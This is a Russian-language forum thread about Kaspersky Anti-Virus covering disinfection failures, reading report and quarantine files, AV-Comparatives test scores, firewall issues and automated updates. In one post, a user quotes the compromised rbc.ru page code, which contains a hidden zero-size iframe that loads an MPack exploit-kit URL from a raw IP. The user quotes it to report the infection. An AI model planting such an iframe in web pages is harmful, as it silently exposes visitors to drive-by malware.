» KAV / AVP / Антивирус Касперского (Часть 5)

Mushroomer

Цитата:

Я лично видел факт, что последняя 5-ка не смогла вылечить какой-то вирус (даже в Safe mode, даже после перезагрузки)

А поподробней можно этот момент? В чем это выразилось? Нашла, но не смогла вылечить, или не нашла вовсе?

WatsonRus
Давно было дело. Всех деталей уже не упомню. Вирус (кажется это был какой-то из Warezov) 5-ка находила. Вылечить не могла. Ладно, дай думаю в Safe Mode посмотрю, что будет. Вирус снова нашла, говорит после перезагрузки вылечит. А после перезагрузки снова вирус.

Mushroomer
Это другое дело, самое главное, что находила. Спасибо за информацию. Мне самое главное, чтобы находила, удалить я и сам могу хотя бы из DOS. На "лечение" любым антивиром никогда не полагался. Мне всегда легче самому посмотреть и все сделать.

KapralBel

Цитата:

Если файл находится в какой либо не корневой папке то указывай её

Есть, товарисч Капрал! Будет сделано в следующий раз. Сорри за флейм в юбилейном посте - не удержался.

Чем можно просмотреть файлы *.rpt из папки C:\Documents and Settings\All Users\Application Data\Kaspersky Lab\AVP6\Report?

История такова. Антивирус удалил файл из system32 (Windows XP Prof Sp1). Система стала очень медленно загружаться. В Event Viewer куча сообщений с ошибками. Но сами события не открываются. Report из самого KAV просмотреть не получается (зависает процесс). sfc /scannow задумывается и висит, даже не доходя до запроса диска.
При этом процессор не загружен, bad-секторов нет, вирусов тоже нет. Обращений к венчестеру тоже нет. Компьютер не зависает.

Файл удалил не я (не на моем компьютере). Задача найти имя этого файла и восстановить вручную. В папке C:\Documents and Settings\All Users\Application Data\Kaspersky Lab\AVP6\Quarantine ничего нет. Что еще можно сделать.

str
Какой файл удален?
Какие ошибки (источник и номер)

KapralBel
Какой файл удален не знаю (Хочу определить какой, поэтому и пытаюсь просмотреть Report).
В папке C:\Documents and Settings\All Users\Application Data\Kaspersky Lab\AVP6\Backup этот файл я так понимаю лежит. Но как посмотреть, что за файл. Расширение *.klq ?

str
А имя *.klq

KapralBel
Имя ни о чем не говорит. Вот имя файла: 9c6eb726cc174519.klq
Разбирался далее. По ходу дела похоже я загнул с отсутствием вируса. Похоже, что словили Ad.ware.Win32.Agent.bn


Добавлено:
Все разобрался. Вопрос снимается. Пофиксил WinSock и скорость нормализовалась. Жаль, что с этой задачей не смог справиться KAV6. Хотя детектил вирус и фиксил. Правдо оговорюсь, что лечение велось с завирусованной системы.

str
При установке КАВа делал самозащиту?

KapralBel
Если про самозащиту, которая включается при установке KAV, то включал.
Если про "контроль целостности приложений", то не включал.

Сегодня на Зnews прочитал. http://www.nanoscan.com.Нашла Panda 7 звирей и все в почтовых вложения.Проверил Каспером-0. Кто-нибудь еще пробовал?
Каспер-6.0.1.411
Outpost Firewall Pro ver. 4.0.1007.7323 (591)
Ad-aware1.06

Negdem
1. Ссылочка какая-то левая и не открывается
2. Не понял -
Панда нашла зверье и удалила, а потом их искал Каспер и не нашел? Бедняга - не дали найти несуществующий вирь
или
Панда нашла и не удалила (круть сплошная) а потом Каспер их не нашел?

Хоть какие вирусы то были?

KapralBel
Извиняюсь за ссылку, это не ссылка левая, а я слегка,дело к вечеру.Вот она http://www.nanoscan.com/
Трояны.Найти то нашла, но я не дал удалить.Проверил по указанным путям Каспером-0.
C:\Documents and Settings\User\Application Data\Thunderbird\Profiles\b12stghj.default\Mail\Local Folders\Junk        

Negdem
Ну и пошли их на newvirus@kaspersky.com
и скажешь что за вирусы нашлись

ЗЫ.
Цитата:

C:\Documents and Settings\User\Application Data\Thunderbird\Profiles\b12stghj.default\Mail\Local Folders\Junk

К сожалению к этой папке у меня доступа нет

Сегодня при заходе на rbc KAV выдает Trojan-downloader.JS.Agent.ep.

valhalla

Цитата:

Сегодня при заходе на rbc

Если это rbc.ru, то сейчас зашёл туда, KAV спокоен!

Gawa
Похоже пофиксили уже. Троян пытался тянуться с
h**p://81.95.150.42/MPack091cbt/index.php

Добавлено:
Код rbc.htm был такой

Цитата:

<b><a href="http://www.cnews.ru/tv/online.php?id=23" class="red">Трансляция видео-моста, посвященного открытию Детского портала Москвы <iframe src="http://81.95.150.42/MPack091cbt/index.php" width=0 height=0></iframe></a></b></li>

P.S. Забавно.
Цитата:

http://www.cnews.ru

на форуме заменяется на
Цитата:

http://forum.ru-board.com

Прошу прощение, но наверно надо и до вас донести информацию:

по результатам сравнительного тестирования эффективности проактивной защиты, проведенном австрийской тестовой лабораторией AV-Comparatives

Касперский 6 занял 15 место из 17 !!!!

отловил всего 9%(!) предложенной ему гадости

http://www.av-comparatives.org/seiten/comparatives.html


Результаты тестирования: http://www.av-comparatives.org/seiten/ergebnisse_2007_05.php

Результаты тестирования в pdf: http://www.av-comparatives.org/seiten/ergebnisse/report14.pdf


Результаты тестирования Касперкского 7 - из 20522 всякой нечести отловил 7207. Это всего 35%

http://www.av-comparatives.org/seiten/ergebnisse/kav7.pdf




Зачем нужен такой антивирус?

MorozovSasha
Тестировалась только проактивка, т.е. без задействования ав-баз. Понятно?
И, кстати, заметно, что семерка по этому параметру весьма подтянулась.

AITL

я то понимаю что проактивка... но 9 процентов это уже жесть!
или нет?

NOD 68 процентов отловил, ДрВеб на 9 месте ...

MorozovSasha
Порадовавшись этими замечательными результатами НОДа следует посетить соответствующую ветку на этом форуме и полистав последние несколько страниц, убедиться, что пропускает нынче НОД неприлично много. Отсылаемые юзерами экземпляры зверья, нодовский вирлаб игнорирует неделями. Обновления нерегулярны. Лечение оставляет желать лучшего. Не исключено конечно, что для НОДа это временные трудности, они сейчас видать сильно третьей версией увлечены (и отвлечены). Но это офтопик в данной теме.


Добавлено:
А, потом, мы же с Вами достоверно незнаем , как именно реализована "проактивка" в тех или иных антивирусах. Орать "Подозрительный файл!" на каждый неизвестный пакер ума много не надо

Цитата:

valhalla
Сегодня при заходе на rbc KAV выдает Trojan-downloader.JS.Agent.ep.

Да, вчера вечером тоже был точно такой же "казус". Ближе к ночи еще раз зашел на Rbc.ru - вроде стало все нормуль.
Поскольку это не первый случай с нормальными, вроде бы, сайтами, то тенденция настораживает...

У меня малая сеть : один компьютер с ADSL модемом (включен всё время,
kav 6.0.2.621 (Проактивная защита отключена)) и езернет до второго
компьютера, если второй компьютер компьютер включить через Windows
Брандмаузер то он не работает (Windows XP 5.1 (2600) Service Pack
2)(исключений нет), хотя все Службы
(DHCP(87),DHCP(88),DSN,FTP-сервер,UPnP(TCP),UPnP(UDP),Безопасный
веб-сервер (HTTPS),Веб-сервер (HTTP),Дистанционное управление рабочим
столом,Почтовый сервер Интернета (SMTP), Протокол Internet Mail Access
Protocol версия 3(IMAP3),Протокол Internet Mail Access Protocol версия
4(IMAP4), Протокол Post Office Protocol версия 3 (POP3)) и ICMP (находящиеся
по умолчанию) включены. А без Брандмаузера работают (речь идёт о
выходе второго компьютера в интернет), почему?

leo2006, на рк-мир тоже был такой "казус". как потом оказалось, в страницу действительно вшили зверьё.
так что не всегда это ложно.
по крайней мере касп поймал, не то что с авасточкой нахватали.
в который раз убеждаюсь, что касперский лучший.
кстати в шапке поправьте. касп с вистой тоже работает.

EsTeR
На РБК именно конкретный вирь сидел, а не "казус".

такс........Добрый люд. предлагаю решение автоматического обновления касперского из
ZIPфайлов с его же сайта. http://support.kaspersky.ru/kav6mp2/update?qid=208635464
что сделал Я.........
я взял программы:
Iolo Macromagic 4.1t
Eraser 5.8
DownloadMaster 5.3.3.1087
Winrar 3.70
с помошью макромэджика автоматизировал нажатие всяких "ОКеев" и прочих подтверждений......
все программы большенство операций выполняют с коммандной строки
сначала запускается еразер с удаленим ПРЕДЫДУЩЕГО скаченного файла, после он выдаёт репорт о его успешном удалении. по закрытию репорта запускается доунлоад мастер и скачивает указанный файл в указаннае место и переименовывает файл в нужное имя, затем выдаётся предложение на закрытие с таймером, после него запускается винрар и разархивирует скаченный файл в указанную папку из которой обновляется касперский.......дальше можно приладить автоматическое обновление касперского а можно это оставить на его "усмотрение".
Я сделал три отдельных "макроса" для каждого обновления.
Хочу услышать ваши предложения и комментарии.
делов том что использованы те программы которые есть почти у каждого на компе, за исключением Макромэджика. всплывающие окна и подтверждения из программ типа еразер и даунлоадмастер, использованы как триггеры завершения операций.
возможно то что я нагородил можно упростить каким то другим способом......но каким?
надо бы коды возврата с программ получить......ну можно в счедулере от KAV 4.5.094 это же сделать........ вообщем жду ваших отзывов, и могу "скрипт" кинуть кому интересно

Добавлено:
MorozovSasha

Цитата:

Результаты тестирования: http://www.av-comparatives.org/seiten/ergebnisse_2007_05.php

Error 404 - File not found

The requested file could not be found.

Please ensure that you are trying to access the correct URL. Only links to our main site are allowed.


If you have reached this error message from one of your "bookmarks" or "internet favourites" then please update the bookmark/favourite.
If you have reached this error message by following an out-of-date link from a web page then please inform the person responsible for that web page, so that the link may be corrected or removed.

AITL

Цитата:

Орать "Подозрительный файл!" на каждый неизвестный пакер ума много не надо

У Нода всего 2 ложных срабатывания...

Цитата:

такс........Добрый люд. предлагаю решение автоматического обновления касперского из ZIPфайлов с его же сайта

А какой смысл обновлять из zip файлов? Если он и так нормально обновляется.

shuravi

Цитата:

А какой смысл обновлять из zip файлов? Если он и так нормально обновляется.

За энное кол-во шуршащих бумажек - да! Но имхо он того не стит!